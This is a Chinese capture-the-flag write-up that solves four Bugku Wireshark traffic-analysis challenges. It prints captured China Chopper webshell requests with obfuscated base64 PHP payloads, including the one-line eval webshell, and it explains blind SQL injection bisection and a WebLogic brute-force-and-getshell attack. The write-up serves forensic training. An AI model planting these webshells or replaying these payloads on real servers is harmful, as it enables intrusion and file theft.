以下全是分析类题目,每个都用到了wireshark。
bugku-ctf 第一题:中国菜刀
下载压缩包
在网站上下载下的是一个caodao.zip压缩包,解压缩得到caodao.pcapng文件。
使用wireshark打开caodao.pcapng,
点击搜索http
点击第一个http包,选择复制纯文本。
BBlE.?r@
7=P%-Pj123=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9J0M6XFx3d3dyb290XFwnOyRGPUBvcGVuZGlyKCREKTtpZigkRj09TlVMTCl7ZWNobygiRVJST1I6Ly8gUGF0aCBOb3QgRm91bmQgT3IgTm8gUGVybWlzc2lvbiEiKTt9ZWxzZXskTT1OVUxMOyRMPU5VTEw7d2hpbGUoJE49QHJlYWRkaXIoJEYpKXskUD0kRC4nLycuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSJcdCIuJFQuIlx0Ii5AZmlsZXNpemUoJFApLiJcdCIuJEUuIlxuIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJYQFkiKTtkaWUoKTs%3D'));");"));
去掉头尾,在尾部加上==,用BASE64解码
逐个分析。
看着$D应该是显示文件啥的!!
继续走!
第二个是个显示的文本,好像没啥,继续!
BBlE?x@
7=P#J)P,POST /3.php HTTP/1.1
X-Forwarded-For: 241.38.53.25
Referer: http://192.168.1.145/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
Host: 192.168.1.145
Content-Length: 412
Cache-Control: no-cache
123=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEY9J0M6XFx3d3dyb290XFwzLnBocCc7JFA9QGZvcGVuKCRGLCdyJyk7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));");"));
第三个:好像是显示3.php里的内容的。继续走!!
分析第4个http包:
同样的步骤
BlBE@|
7=PJ)#P@/HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 08:48:02 GMT
Server: Apache/2.2.22 (Win32) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 33
Content-Type: text/html
X@Y<?php eval($_POST[123]);?> X@Y
发现是php的一句话木马。
觉得应该离flag不远了!继续走:
第五个包:
BBlE,?@
7=PnR
PhPOST /3.php HTTP/1.1
X-Forwarded-For: 241.38.53.25
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.145/
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
Host: 192.168.1.145
Content-Length: 472
Cache-Control: no-cache
123=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEY9IkM6XFx3d3dyb290XFxmbGFnLnRhci5neiI7JGZwPUBmb3BlbigkRiwncicpO2lmKEBmZ2V0YygkZnApKXtAZmNsb3NlKCRmcCk7QHJlYWRmaWxlKCRGKTt9ZWxzZXtlY2hvKCdFUlJPUjovLyBDYW4gTm90IFJlYWQnKTt9O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));");"));
解码
发现是显示一个flag.tar.gz一个压缩包里面的东西,这个里面应该就是flag了。
继续分析最后一个!!
BlBEE
7=PnUP@HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 08:48:26 GMT
Server: Apache/2.2.22 (Win32) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 209
Content-Type: text/html
X@YwpWY
0.+['|
wACHnrda/Tp{Dt>v=ui[9YzG/opNGr:
}?swcR?YN*mej$)$f,iMxyS(X@Y
发现是一串看不懂的乱码!!
直接找到:直接右键显示分组字节:
最后解码改成压缩,开始一直点增加,最后就会出现flag!!!
得到:
key{8769fe393f2b998fa6a11afe2bfcd65e}
bugku-ctf 第二题:信息提取
下载下来用wireshark打开
只有http和tcp的包,我们只关心http包,所以我们在过滤中输入http,只显示http内容
粗略的看一下,结合题目的提示“sqlmap用过吗”,可以看出这是一个布尔盲注的过程,从sql注入检测,猜解数据库,表名...
一位一位的猜取flag,然后用二分法判断其ascii码的范围并最终确定这一位的值。
第806个包是读取flag第一位的数据包。
为了更明了的查看语句,可以导出对象查看
将其payload解码一下是这样的,判断其ascii码是否大于64
我们可以以64这个ascii码为一个字符的分界线,我们不需要看返回值,只需要往下看到下一个64就能判断ascii码是什么,我们以第一个字符为例,可以看到第一个字符判断的时候,先判断其是否大于64,后面又判断了是否大于96,说明这个字符肯定大于64,所以此时作比较的ascii码增加64的二分之一,即96,接着向下看,作比较的ascii码变成了80,说明这个字符小于96,所以大于64又小于96,继续向下分32的二分之一,即80,在接着向下看,作比较的ascii码变为了72,说明这个字符依然小于80,继续向下分16的二分之一,即72,继续向下看,作比较的ascii码变为了76,说明这个ascii码大于72,所以向上分8的二分之一,即76,继续向下看,作比较的ascii码变为了74,说明这个ascii码小于76,所以向下分4的二分之一,即74,继续向下看,作比较的ascii码变成了73,且下一个包变为了64,说明已经判断结束,因此大于72又不大于73,这个ascii码为73,对应的字符为I。这就是二分法。
第二个对比得出是83。
83—>S
以此类推
71—>G
123—>{
以此类推,其flag为ISG{BLind_SQl_InJEcTi0N_DeTEc***}(我建议还是自己做一下的好,哈哈)。本题需要一定的耐心和SQL注入基础,虽然没很绕,但是也是个体力活。
bugku-ctf 第三题:手机热点
先下载流量包,下载后还是wireshark打开,
嗯,陌生的数据包。。。
必应 “蓝牙传输协议”,即obex。
wireshark搜索obex用WireShark分析
传了一个“secret.rar”压缩包
选中
导出为x.rar,解压得到Flag
SYC{this_is_bluetooth}
bugku-ctf 第四题:weblogic
下载流量包,下载后还是wireshark打开
考点
weblogic 攻击流量审计。模拟了爆破weblogic登录密码,通过部署war包getshell,执行命令获取hostname的操作。
猜测黑客的攻击过程:
黑客有可能爆破了weblogic登录密码,获取到主机名hostname.
通过http协议过滤,ctrl+f搜索选择字符串、分组字节流,输入hostname。
通过检索,找到了两个包 no.658 和no.662
右键选择追踪流-->TCP流
显示和保存数据为UTF-8,查找hostname,查找~
注意:题目有提示哦~
Tip:主机名为十六进制。
flag格式:flag{}
试试 flag{6ad4c5a09043}
本文始发于微信公众号(LemonSec):【CTF web入门第八篇】web入门
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论